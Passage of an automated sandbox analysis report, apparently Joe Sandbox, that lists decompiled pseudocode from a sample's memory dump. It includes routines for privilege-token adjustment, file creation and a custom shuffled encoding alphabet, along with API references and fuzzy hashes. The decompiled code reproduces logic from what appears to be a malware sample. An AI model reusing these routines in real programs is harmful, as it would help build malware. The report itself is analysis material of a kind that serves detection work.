						_t133 = _t133 + 0xfffffffe;
						__eflags = _t155 - 1;
						_t155 = _t155 - 1;
						if(__eflags == 0) {
							L12:
							__eflags = _t155;
							_t143 =  ==  ?  ~_t144 :  ~_t133;
							 *((short*)(_t166 + ( ==  ?  ~_t144 :  ~_t133))) = 0;
							if(_t155 != 0) {
								L19:
								_t169 = _t172[6];
								_t107 = E005D08A0( &(_t172[5]), _t166, _t172[4],  &(_t172[3]),  &(_t172[5]));
								__eflags = _t107;
								if(_t107 == 0) {
									L21:
									_t108 =  *0x5d9b0c; // 0x26f2b8
									 *(_t108 + 8) = 2;
									L22:
									_t129 = 0;
									__eflags = 0;
									goto L23;
								}
								_t109 = _t172[5];
								__eflags = _t109 - 1 - 0x1fffe;
								if(_t109 - 1 < 0x1fffe) {
									_t110 = E005CC380(_t172[6], 0,  &(_t172[1]), _t109);
									_t172 =  &(_t172[4]);
									_t129 = 0;
									__eflags = _t110;
									if(_t110 == 0) {
										goto L23;
									}
									_t156 =  &(_t172[0x49]);
									_t111 = GetSystemDirectoryW( &(_t172[0x49]), 0x104);
									__eflags = _t111;
									if(_t111 == 0) {
										goto L23;
									}
									 *((intOrPtr*)(_t172 + 0x124 + _t111 * 2)) = 0x5c;
									E005D4520(_t172 + 0x126 + _t111 * 2, 0x5c);
									_t174 =  &(_t172[2]);
									__eflags =  *0x5d9ae8;
									if( *0x5d9ae8 == 0) {
										L58:
										_t114 = E005D6E60(0, _t156, _t174[1]);
										_t172 =  &(_t174[3]);
										__eflags = _t114;
										_t172[4] = _t114;
										if(_t114 == 0) {
											goto L23;
										}
										L59:
										_t115 =  *0x5d9b0c; // 0x26f2b8
										 *((intOrPtr*)(_t115 + 8)) = 1;
										E005D4520( &(_t172[9]), 0x5e);
										_t175 =  &(_t172[2]);
										_push(_t175[1]);
										E005D4610(_t169, 0xe,  &(_t172[9]));
										_t172 =  &(_t175[4]);
										_t129 = _t172[4];
										goto L23;
									}
									_t158 = 0xfffffc00;
									_t118 = E005C3180(0x800, 0);
									_t176 =  &(_t174[2]);
									_t146 = _t118;
									while(1) {
										_t137 =  *(_t176 + 0x924 + _t158 * 2) & 0x0000ffff;
										_t119 = _t158;
										__eflags = _t137;
										if(_t137 == 0) {
											break;
										}
										 *(_t146 + 0x800 + _t119 * 2) = _t137;
										_t158 = _t119 + 1;
										__eflags = _t158;
										if(_t158 != 0) {
											continue;
										}
										 *(_t146 + 0x800 + _t119 * 2) = 0;
										L54:
										_t162 = 0;
										__eflags = 0;
										L55:
										__eflags = _t147;
										if(_t147 != 0) {
											E005C91E0(_t147);
											_t172 =  &(_t172[1]);
										}
										__eflags = _t162;
										_t156 =  &(_t172[0x49]);
										if(_t162 != 0) {
											goto L59;
										} else {
											goto L58;
										}
									}
									 *(_t146 + 0x800 + _t119 * 2) = 0;
									_t176[2] = _t146;
									E005D4520( &(_t176[9]), 0x5d);
									_t147 = _t176[2];
									_t177 =  &(_t176[2]);
									_t122 = 0x400;
									_t138 = _t147;
									while(1) {
										__eflags =  *_t138;
										if( *_t138 == 0) {
											break;
										}
										_t138 = _t138 + 2;
										_t122 = _t122 - 1;
										__eflags = _t122;
										if(_t122 != 0) {
											continue;
										}
										L46:
										_t123 = 0x400;
										_t177[2] = _t177[1];
										_t140 = _t147;
										while(1) {
											__eflags =  *_t140;
											if( *_t140 == 0) {
												break;
											}
											_t140 = _t140 + 2;
											_t123 = _t123 - 1;
											__eflags = _t123;
											if(_t123 != 0) {
												continue;
											}
											goto L54;
										}
										_t149 = 0;
										__eflags = 0;
										while(1) {
											_t161 = _t149;
											_t151 =  *(_t177[2] + _t161 * 2) & 0x0000ffff;
											__eflags = _t151;
											if(_t151 == 0) {
												break;
											}
											 *(_t140 + _t161 * 2) = _t151;
											_t73 = _t161 + 1; // 0x1
											_t149 = _t73;
											__eflags = _t123 - _t149;
											if(_t123 != _t149) {
												continue;
											}
											_t147 =  *_t177;
											 *(_t140 + _t161 * 2) = 0;
											goto L54;
										}
										 *(_t140 + _t161 * 2) = 0;
										_t162 = 0;
										_push(0);
										_push(0);
										_push(0x420);
										_push(_t177[3]);
										_push( &(_t177[7]));
										_t125 = E005C5470( &(_t177[8]));
										_t147 = _t177[6];
										_t172 =  &(_t177[6]);
										__eflags = _t125;
										if(_t125 != 0) {
											CloseHandle(_t172[8]);
											CloseHandle(_t172[7]);
											_t147 =  *_t172;
											_t162 = 1;
										}
										goto L55;
									}
									_t159 = 0;
									__eflags = 0;
									while(1) {
										_t148 = _t159;
										_t160 =  *(_t177 + 0x24 + _t159 * 2) & 0x0000ffff;
										__eflags = _t160;
										if(_t160 == 0) {
											break;
										}
										 *(_t138 + _t148 * 2) = _t160;
										_t63 = _t148 + 1; // 0x1
										_t159 = _t63;
										__eflags = _t122 - _t159;
										if(_t122 != _t159) {
											continue;
										}
										break;
									}
									 *(_t138 + _t148 * 2) = 0;
									_t147 =  *_t177;
									goto L46;
								}
								goto L21;
							}
							goto L22;
						}
						__eflags = _t105 - 0x7ffffffd;
						_t105 = _t105 + 1;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					 *(_t166 + _t105 * 2) = 0;
					goto L19;
				}
			}

0x005c4dea
0x005c4def
0x005c4df1
0x005c4df3
0x005c4df7
0x005c4dfb
0x005c4dff
0x005c4e06
0x005c4e06
0x005c4e0b
0x005c4e34
0x005c4e3b
0x00000000
0x005c4e0d
0x005c4e0f
0x005c4e14
0x005c4e15
0x005c4e1d
0x005c4e1e
0x005c4e27
0x00000000
0x00000000
0x005c4e29
0x005c4e2b
0x005c4e2d
0x005c4f0b
0x005c4f0b
0x005c4f11
0x005c4f14
0x005c4f19
0x005c4f19
0x005c4f1e
0x005c4f21
0x005c4f26
0x005c4f26
0x005c4f29
0x005c4f2f
0x005c4f32
0x005c4f37
0x005c4f46
0x005c4f46
0x005c4e3f
0x005c4e45
0x005c4e4a
0x005c4e4d
0x005c4e4f
0x005c4e51
0x005c4eb4
0x005c4eb6
0x005c4eb6
0x00000000
0x005c4eb6
0x005c4e53
0x005c4e55
0x005c4eba
0x005c4ebc
0x005c4ebe
0x005c4ec0
0x005c4ec0
0x005c4f09
0x005c4f09
0x00000000
0x005c4f09
0x005c4e57
0x005c4e5a
0x005c4e5c
0x005c4e61
0x005c4e65
0x005c4e69
0x005c4e6e
0x005c4e6e
0x005c4e74
0x005c4e78
0x005c4e78
0x005c4e7a
0x005c4e7a
0x005c4e7e
0x005c4e81
0x00000000
0x00000000
0x005c4e83
0x005c4e87
0x005c4e8a
0x005c4e90
0x005c4e92
0x005c4e95
0x005c4ea1
0x005c4ea5
0x005c4ea7
0x005c4eaa
0x005c4eb0
0x005c4ecd
0x005c4ecd
0x005c4ee3
0x005c4ee8
0x005c4eea
0x005c4efb
0x005c4efb
0x005c4f00
0x005c4f07
0x005c4f07
0x005c4f07
0x00000000
0x005c4f07
0x005c4eec
0x005c4ef3
0x005c4ef9
0x005c4f53
0x005c4f58
0x005c4f5b
0x005c4f5d
0x005c4f5f
0x00000000
0x00000000
0x005c4f61
0x005c4f6e
0x005c4f74
0x005c4f76
0x00000000
0x00000000
0x005c4f78
0x005c4f8d
0x005c4f92
0x005c4f95
0x005c4f9c
0x005c5097
0x005c509e
0x005c50a3
0x005c50a6
0x005c50a8
0x005c50ac
0x00000000
0x00000000
0x005c50b2
0x005c50b2
0x005c50bb
0x005c50c5
0x005c50ca
0x005c50cd
0x005c50d5
0x005c50da
0x005c50dd
0x00000000
0x005c50dd
0x005c4fa2
0x005c4fae
0x005c4fb3
0x005c4fb6
0x005c4fb8
0x005c4fb8
0x005c4fc0
0x005c4fc2
0x005c4fc5
0x00000000
0x00000000
0x005c4fc9
0x005c4fd1
0x005c4fd1
0x005c4fd2
0x00000000
0x00000000
0x005c4fd4
0x005c507d
0x005c507d
0x005c507d
0x005c507f
0x005c507f
0x005c5081
0x005c5084
0x005c5089
0x005c5089
0x005c508c
0x005c508e
0x005c5095
0x00000000
0x00000000
0x00000000
0x00000000
0x005c5095
0x005c4fe3
0x005c4ff4
0x005c4ff8
0x005c4ffd
0x005c5001
0x005c5004
0x005c5009
0x005c500b
0x005c500b
0x005c500f
0x00000000
0x00000000
0x005c5011
0x005c5014
0x005c5014
0x005c5015
0x00000000
0x00000000
0x005c503b
0x005c503f
0x005c5044
0x005c5048
0x005c504a
0x005c504a
0x005c504e
0x00000000
0x00000000
0x005c5050
0x005c5053
0x005c5053
0x005c5054
0x00000000
0x00000000
0x00000000
0x005c5056
0x005c5058
0x005c5058
0x005c505a
0x005c505a
0x005c5060
0x005c5064
0x005c5067
0x00000000
0x00000000
0x005c5069
0x005c506d
0x005c506d
0x005c5070
0x005c5072
0x00000000
0x00000000
0x005c5074
0x005c5077
0x00000000
0x005c5077
0x005c50e6
0x005c50ec
0x005c50f6
0x005c50f7
0x005c50f8
0x005c50fd
0x005c5101
0x005c5103
0x005c5108
0x005c510c
0x005c510f
0x005c5111
0x005c5121
0x005c5127
0x005c5129
0x005c512e
0x005c512e
0x00000000
0x005c5111
0x005c5019
0x005c5019
0x005c501b
0x005c501b
0x005c501d
0x005c5022
0x005c5025
0x00000000
0x00000000
0x005c5027
0x005c502b
0x005c502b
0x005c502e
0x005c5030
0x00000000
0x00000000
0x00000000
0x005c5030
0x005c5032
0x005c5038
0x00000000
0x005c5038
0x00000000
0x005c4ef9
0x00000000
0x005c4eb2
0x005c4e97
0x005c4e9c
0x005c4e9f
0x00000000
0x00000000
0x00000000
0x005c4e9f
0x005c4ec7
0x00000000
0x005c4ec7

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C4F6E
CloseHandle.KERNEL32(?), ref: 005C5121
CloseHandle.KERNEL32(?), ref: 005C5127

Strings

\, xrefs: 005C4F78

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseHandle$DirectorySystem
String ID: \
API String ID: 1693769833-2967466578
Opcode ID: a7d5078d1cdbc424ef0c1282a8588eac37e739f4c308b7b02f390b9acc89e068
Instruction ID: 1964b9d82681dd50e5cb54fcdc45aba26e632bee42f2987068b060d964196949
Opcode Fuzzy Hash: a7d5078d1cdbc424ef0c1282a8588eac37e739f4c308b7b02f390b9acc89e068
Instruction Fuzzy Hash: 1591D2716083029FD7209FA8D849F6BBBE5BFD0304F15892DE589972A1F771D845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 005D2F10, Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E005D2F10(void* __ecx) {
				char _v1036;
				struct _TOKEN_PRIVILEGES _v1052;
				struct _LUID _v1064;
				char _v1068;
				void* _v1072;
				void* _t10;
				intOrPtr _t12;
				void* _t14;
				struct _TOKEN_PRIVILEGES* _t23;
				char* _t25;
				HANDLE* _t27;
				WCHAR* _t28;
				long _t35;
				DWORD* _t36;

				_t36 =  &_v1064;
				_t10 = E005CC430( *((intOrPtr*)(__ecx + 0x10)));
				_t35 = 0;
				if(_t10 == 0) {
					L9:
					return _t35;
				}
				_t12 =  *0x5d9ae8; // 0x0
				if(_t12 == 0) {
					goto L9;
				}
				if( *0x5d9c28 != 0) {
					L7:
					_t25 =  &_v1036;
					E005D4520(_t25, 0x9a);
					_push(_t25);
					_t14 = E005CC440();
					if(_t14 != 0) {
						_push(_t14);
						_t35 = E005CD350();
						E005C91E0(_t14);
					}
					goto L9;
				}
				_t27 =  &_v1072;
				 *_t27 = 0;
				 *_t36 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x28, _t27) != 0) {
					_t28 =  &_v1036;
					E005D4520(_t28, 0x5f);
					_t36 =  &(_t36[2]);
					if(LookupPrivilegeValueW(0, _t28,  &_v1064) != 0) {
						_t23 =  &_v1068;
						_t23->PrivilegeCount = 1;
						_t23->Privileges[0].Luid = 2;
						AdjustTokenPrivileges(_v1072, 0, _t23, 0x10,  &_v1052, _t36);
					}
				}
				 *0x5d9c28 =  *0x5d9c28 + 1;
				goto L7;
			}

0x005d2f13
0x005d2f1e
0x005d2f23
0x005d2f27
0x005d2fe5
0x005d2ff0
0x005d2ff0
0x005d2f2d
0x005d2f34
0x00000000
0x00000000
0x005d2f41
0x005d2fb1
0x005d2fb1
0x005d2fbb
0x005d2fc3
0x005d2fc4
0x005d2fce
0x005d2fd4
0x005d2fda
0x005d2fdd
0x005d2fe2
0x00000000
0x005d2fce
0x005d2f45
0x005d2f49
0x005d2f4b
0x005d2f60
0x005d2f62
0x005d2f69
0x005d2f6e
0x005d2f81
0x005d2f83
0x005d2f8d
0x005d2f93
0x005d2fa5
0x005d2fa5
0x005d2f81
0x005d2fab
0x00000000

APIs

GetCurrentProcess.KERNEL32 ref: 005D2F4E
OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 005D2F58
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005D2F79
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?), ref: 005D2FA5

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: 2ecade10cb3def7553b542d22f1309651034a02da64b0fe3a9a21ed7cdbf121c
Instruction ID: 603f69c1ae1548c1f8fdbd1405ec59d53ba40c303549e2d1faf74815a0601e02
Opcode Fuzzy Hash: 2ecade10cb3def7553b542d22f1309651034a02da64b0fe3a9a21ed7cdbf121c
Instruction Fuzzy Hash: 3D2168B16013015FD7309B64EC8AF6B7BACEB94756F04482BF905C6292EA74D908C761

Uniqueness

Uniqueness Score: -1.00%

Function 005CA4D0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 413
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E005CA4D0(signed int __edx) {
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t121;
				signed int _t123;
				signed int _t132;
				signed int _t136;
				intOrPtr _t144;
				intOrPtr _t146;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				signed short* _t152;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t159;
				void* _t163;
				void* _t166;
				signed int _t172;
				signed int _t178;
				signed short* _t184;
				intOrPtr _t185;
				signed int _t187;
				char _t190;
				signed int _t196;
				char _t201;
				intOrPtr _t202;
				void* _t203;
				signed int* _t204;
				intOrPtr _t205;
				signed int* _t206;
				intOrPtr _t212;
				signed int _t218;
				void* _t220;
				void* _t222;
				intOrPtr _t223;
				void* _t228;
				void* _t247;
				WCHAR* _t254;
				intOrPtr _t256;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t262;
				struct _SECURITY_ATTRIBUTES* _t266;
				void* _t273;
				intOrPtr _t276;
				intOrPtr* _t278;
				intOrPtr _t280;
				intOrPtr _t281;
				intOrPtr _t282;
				void* _t284;
				void* _t285;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				void* _t291;
				void* _t292;
				void* _t294;
				intOrPtr* _t295;
				void* _t296;
				intOrPtr* _t298;
				void* _t299;
				intOrPtr* _t300;
				intOrPtr* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				intOrPtr* _t307;
				void* _t318;

				_t234 = __edx;
				_t278 =  *((intOrPtr*)(_t288 + 0x548));
				if(E005CC430( *_t278) == 0) {
					L2:
					_t254 = _t288 + 0x130;
					E005D4520(_t254, 0x6c);
					_t288 = _t288 + 8;
					L3:
					_t115 =  *0x5d9b40; // 0x0
					if(_t115 != 0) {
						E005C91E0(_t115);
						_t288 = _t288 + 4;
					}
					_t116 = E005CB7A0(_t254);
					_t289 = _t288 + 4;
					_t266 = 0;
					 *0x5d9b40 = _t116;
					_t117 = CreateFileW(_t254, 0xc0000000, 1, 0, 2, 0x80, 0);
					 *(_t289 + 4) = _t117;
					if(_t117 == 0xffffffff) {
						L34:
						return _t266;
					} else {
						_t267 =  *((intOrPtr*)(_t278 + 0xc));
						if( *((intOrPtr*)(_t278 + 0xc)) != 0) {
							E005C1EA0(_t267);
							L005D7400(_t267);
							_t289 = _t289 + 4;
						}
						_t119 = E005C5140(0x10);
						_t290 = _t289 + 4;
						E005C61A0(_t119, 4, 0x400);
						 *((intOrPtr*)(_t278 + 0xc)) = _t119;
						_t269 =  *((intOrPtr*)(_t278 + 0x10));
						if( *((intOrPtr*)(_t278 + 0x10)) != 0) {
							E005C1EA0(_t269);
							L005D7400(_t269);
							_t290 = _t290 + 4;
						}
						_t121 = E005C5140(0x10);
						_t291 = _t290 + 4;
						E005C61A0(_t121, 4, 0x4000);
						 *((intOrPtr*)(_t278 + 0x10)) = _t121;
						_t123 = E005C8160(_t234);
						_t201 = 0;
						_t19 =  ~((_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) + (_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) * 8) + 2; // 0x2
						_push(_t278);
						_push(0);
						_push(_t123 + _t19);
						_push( *((intOrPtr*)(_t291 + 0x10)));
						E005C8A20(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe);
						_t292 = _t291 + 0x10;
						_t280 = E005C8160(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) - (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
						_t132 = E005C8160(_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
						 *((intOrPtr*)(_t292 + 0xc)) = _t280;
						_t212 = _t132 - (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
						_t35 = _t280 + 4; // 0x4
						 *((intOrPtr*)(_t292 + 0x24)) = _t212;
						 *((intOrPtr*)(_t292 + 0x10)) = _t212 + _t35;
						_t136 = E005C8160(_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
						_t246 = _t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe;
						_t318 =  *0x5d9a80 - _t201; // 0x0
						 *((intOrPtr*)(_t292 + 8)) = _t136 - (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
						if(_t318 != 0) {
							L14:
							_t281 =  *((intOrPtr*)(_t292 + 0xc)) + 3;
							 *((intOrPtr*)(_t292 + 0x28)) =  *((intOrPtr*)(_t292 + 8)) +  *((intOrPtr*)(_t292 + 0x10)) + 1;
							do {
								 *((char*)(_t292 + _t201 + 0x230)) = _t201;
								_t201 = _t201 + 1;
							} while (_t201 != 0x100);
							_push( *0x5d9a80);
							_push(_t292 + 0x330);
							_push(0x100);
							_push(_t292 + 0x230);
							_t144 = E005C7400(_t292 + 0x330, E005CB110());
							_t294 = _t292 + 0x18;
							_t202 = _t144;
							 *((intOrPtr*)(_t294 + 0x2c)) = 0;
							_t256 =  *((intOrPtr*)(_t294 + 0x54c));
							_t146 = E005C3CF0(_t294 + 0x2c, _t246, _t256, _t294 + 0x2c);
							_t295 = _t294 + 8;
							_t266 = 0;
							 *_t295 = _t146;
							if(_t146 == 0) {
								L30:
								_t247 =  *(_t295 + 4);
								L33:
								CloseHandle(_t247);
								goto L34;
							}
							_t216 =  *((intOrPtr*)(_t295 + 0x2c));
							if( *((intOrPtr*)(_t295 + 0x2c)) == 0) {
								goto L30;
							}
							 *((intOrPtr*)(_t295 + 0x1c)) = _t202;
							 *((intOrPtr*)(_t295 + 0x20)) = _t281;
							_t203 =  *(_t295 + 0xc);
							_t149 = E005D2E00( *(_t295 + 0xc), _t216, _t146);
							_t296 = _t295 + 0xc;
							if(_t149 == 0) {
								_t247 = _t203;
								goto L33;
							}
							_t150 = E005C3180(0x100, 0);
							_push(_t256);
							_t257 = _t150;
							_push(_t150);
							_push(0xa);
							_push(6);
							_t151 = E005D2C70(_t150, _t246);
							_t298 = _t296 + 0x18;
							_t282 = _t151;
							 *_t298 = _t151;
							_t152 = E005C3EB0();
							_t247 = _t203;
							if(_t152 == 0) {
								goto L33;
							}
							 *_t298 = 0;
							 *((intOrPtr*)(_t298 + 0x18)) = _t257;
							_t204 = _t298 + 0x30;
							_t266 = 0;
							_t258 = 0;
							_t218 =  *_t152 & 0x0000ffff;
							 *((intOrPtr*)(_t298 + 0x14)) = _t282 + _t257;
							if(_t218 == 0) {
								L24:
								_t284 = _t298 + 0x130;
								E005D7160(_t284, 0x6d);
								_t299 = _t298 + 8;
								_push( *((intOrPtr*)(_t299 + 0x28)));
								_push( *((intOrPtr*)(_t299 + 0x14)));
								_push( *((intOrPtr*)(_t299 + 0x28)));
								_push( *((intOrPtr*)(_t299 + 0x28)));
								_push(_t284);
								_push(0x80);
								_push(_t204);
								_t154 = E005CF0E0();
								_t300 = _t299 + 0x1c;
								_t155 = _t154 + _t258;
								 *_t300 = _t155;
								_push( *0x5d9a80);
								_push( *((intOrPtr*)(_t300 + 0x18)));
								_push(_t155);
								_push(_t300 + 0x3c);
								_t157 = E005CB110();
								_t301 = _t300 + 0x10;
								 *_t301 = _t157;
								_t262 =  *(_t301 + 0xc);
								_t159 = E005D2E00(_t262,  *((intOrPtr*)(_t301 + 0x18)),  *((intOrPtr*)(_t300 + 0x18)) + _t157 -  *((intOrPtr*)(_t301 + 0x18)));
								_t302 = _t301 + 0xc;
								if(_t159 == 0) {
									_t247 = _t262;
									goto L33;
								}
								_t205 =  *((intOrPtr*)(_t302 + 0x548));
								_push(_t205);
								_push( *((intOrPtr*)(_t302 + 0xc)) + 2);
								_push(0);
								_push(_t262);
								E005C8A20(_t247);
								_t303 = _t302 + 0x10;
								_t163 = E005C98C0();
								_t247 = _t262;
								if(_t163 == 0) {
									goto L33;
								}
								_t220 = 0;
								while( *((short*)(_t163 + _t220)) != 0) {
									_t220 = _t220 + 2;
									if(_t220 != 0x400) {
										continue;
									}
									_t266 = 0;
									goto L33;
								}
								_t273 = _t247;
								E005CAFA0(_t220, _t247, _t247, _t163, _t220, _t205);
								_t304 = _t303 + 0x10;
								_push(_t205);
								_push( *((intOrPtr*)(_t304 + 0x28)));
								_push(0);
								_t285 = _t273;
								_push(_t273);
								E005C8A20(_t247);
								_t305 = _t304 + 0x10;
								_t166 = E005C81B0();
								if(_t166 == 0) {
									_t266 = 0;
									L44:
									_t247 = _t285;
									goto L33;
								}
								_t222 = 0;
								_t247 = _t285;
								while( *((short*)(_t166 + _t222)) != 0) {
									_t222 = _t222 + 2;
									_t266 = 0;
									if(_t222 != 0x400) {
										continue;
									}
									goto L33;
								}
								E005CAFA0(_t222, _t247, _t247, _t166, _t222, _t205);
								_t306 = _t305 + 0x10;
								_t266 = 0;
								_push(_t205);
								_push( *((intOrPtr*)(_t306 + 0xc)));
								_push(0);
								_push(_t247);
								E005C8A20(_t247);
								_t307 = _t306 + 0x10;
								_t223 =  *0x5d9bd4; // 0x128a80
								 *_t307 = 0;
								if(E005C1B50(_t223, _t307) == 0) {
									goto L44;
								}
								_t224 =  *_t307;
								_t247 = _t285;
								if( *_t307 != 0) {
									E005CAFA0(_t224, _t247, _t247, _t170, _t224, _t205);
									_t172 = E005C8160(_t247);
									_t104 =  ~((_t172 * 0xcccccccd >> 0x20 >> 2) + (_t172 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
									_push(_t205);
									_push(_t172 + _t104);
									_push(0);
									_push(_t285);
									E005C8A20(_t172 * 0xcccccccd >> 0x20 >> 2);
									_t178 = E005C8160(_t172 * 0xcccccccd >> 0x20 >> 2);
									_t112 =  ~((_t178 * 0xcccccccd >> 0x20 >> 2) + (_t178 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
									_push(_t205);
									_push(0);
									_push(_t178 + _t112);
									_push(_t285);
									E005C8A20(_t178 * 0xcccccccd >> 0x20 >> 2);
									_t247 = _t285;
									_t266 = 1;
								}
								goto L33;
							}
							_t206 = _t298 + 0x30;
							_t184 =  &(_t152[1]);
							while(1) {
								 *_t206 = _t218;
								_t204 =  &(_t206[0]);
								_t258 =  *_t298 + 1;
								 *_t298 = _t258;
								if(_t258 > 0x3f) {
									goto L24;
								}
								_t218 =  *_t184 & 0x0000ffff;
								_t184 =  &(_t184[1]);
								if(_t218 != 0) {
									continue;
								}
								goto L24;
							}
							goto L24;
						} else {
							_t185 = E005C3180(0x40, 0);
							_t276 = _t185;
							 *0x5d9a80 = _t185;
							E005CC400(_t185, "HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT", 0x40);
							_t292 = _t292 + 0x14;
							_t287 = 0;
							goto L12;
							do {
								do {
									L12:
									_t187 = E005C8160(_t246);
									_t246 = _t187 * 0x38e38e39 >> 0x20 >> 1;
									_t228 = _t187 - (_t187 * 0x38e38e39 >> 0x20 >> 1) + (_t187 * 0x38e38e39 >> 0x20 >> 1) * 8;
								} while (_t228 == _t287);
								_t246 =  *((intOrPtr*)(_t276 + _t228 + 0x37));
								_t190 =  *((intOrPtr*)(_t276 + _t287 + 0x37));
								 *((char*)(_t276 + _t287 + 0x37)) =  *((intOrPtr*)(_t276 + _t228 + 0x37));
								_t287 = _t287 + 1;
								 *((char*)(_t276 + _t228 + 0x37)) = _t190;
							} while (_t287 != 9);
							goto L14;
						}
					}
				}
				_t196 = E005C8160(__edx);
				_t234 = _t196 % E005CC430( *_t278);
				_t254 =  *(E005C42F0( *_t278, _t196 % E005CC430( *_t278)));
				if(_t254 != 0) {
					goto L3;
				}
				goto L2;
			}

0x005ca4d0
0x005ca4da
0x005ca4eb
0x005ca513
0x005ca513
0x005ca51d
0x005ca522
0x005ca525
0x005ca525
0x005ca52c
0x005ca52f
0x005ca534
0x005ca534
0x005ca538
0x005ca53d
0x005ca540
0x005ca542
0x005ca558
0x005ca561
0x005ca565
0x005ca89d
0x005ca8a9
0x005ca56b
0x005ca56b
0x005ca570
0x005ca574
0x005ca57a
0x005ca57f
0x005ca57f
0x005ca584
0x005ca589
0x005ca597
0x005ca59c
0x005ca59f
0x005ca5a4
0x005ca5a8
0x005ca5ae
0x005ca5b3
0x005ca5b3
0x005ca5b8
0x005ca5bd
0x005ca5cb
0x005ca5d0
0x005ca5d3
0x005ca5df
0x005ca5ed
0x005ca5f1
0x005ca5f2
0x005ca5f3
0x005ca5f4
0x005ca5f8
0x005ca5fd
0x005ca617
0x005ca619
0x005ca622
0x005ca62f
0x005ca631
0x005ca635
0x005ca639
0x005ca63d
0x005ca649
0x005ca651
0x005ca657
0x005ca65b
0x005ca6af
0x005ca6b7
0x005ca6c2
0x005ca6c6
0x005ca6c6
0x005ca6cd
0x005ca6ce
0x005ca6e4
0x005ca6ea
0x005ca6eb
0x005ca6f0
0x005ca6fb
0x005ca700
0x005ca703
0x005ca709
0x005ca710
0x005ca718
0x005ca71d
0x005ca720
0x005ca724
0x005ca727
0x005ca88a
0x005ca88a
0x005ca896
0x005ca897
0x00000000
0x005ca897
0x005ca72d
0x005ca733
0x00000000
0x00000000
0x005ca739
0x005ca73d
0x005ca747
0x005ca74a
0x005ca74f
0x005ca754
0x005ca890
0x00000000
0x005ca890
0x005ca761
0x005ca769
0x005ca76a
0x005ca76c
0x005ca76d
0x005ca76f
0x005ca771
0x005ca776
0x005ca780
0x005ca782
0x005ca785
0x005ca78c
0x005ca78e
0x00000000
0x00000000
0x005ca794
0x005ca79d
0x005ca7a1
0x005ca7a5
0x005ca7a7
0x005ca7ac
0x005ca7af
0x005ca7b6
0x005ca7d9
0x005ca7d9
0x005ca7e3
0x005ca7e8
0x005ca7eb
0x005ca7ef
0x005ca7f3
0x005ca7f7
0x005ca7fb
0x005ca7fc
0x005ca801
0x005ca802
0x005ca807
0x005ca80a
0x005ca80c
0x005ca80f
0x005ca819
0x005ca81a
0x005ca81f
0x005ca820
0x005ca825
0x005ca828
0x005ca835
0x005ca83a
0x005ca83f
0x005ca844
0x005ca894
0x00000000
0x005ca894
0x005ca84a
0x005ca854
0x005ca855
0x005ca856
0x005ca858
0x005ca859
0x005ca85e
0x005ca867
0x005ca86e
0x005ca870
0x00000000
0x00000000
0x005ca872
0x005ca874
0x005ca87b
0x005ca884
0x00000000
0x00000000
0x005ca886
0x00000000
0x005ca886
0x005ca8ae
0x005ca8b0
0x005ca8b5
0x005ca8b8
0x005ca8b9
0x005ca8bd
0x005ca8bf
0x005ca8c1
0x005ca8c2
0x005ca8c7
0x005ca8d0
0x005ca8d7
0x005ca8f3
0x005ca999
0x005ca999
0x00000000
0x005ca999
0x005ca8d9
0x005ca8db
0x005ca8dd
0x005ca8e4
0x005ca8e7
0x005ca8ef
0x00000000
0x00000000
0x00000000
0x005ca8f1
0x005ca900
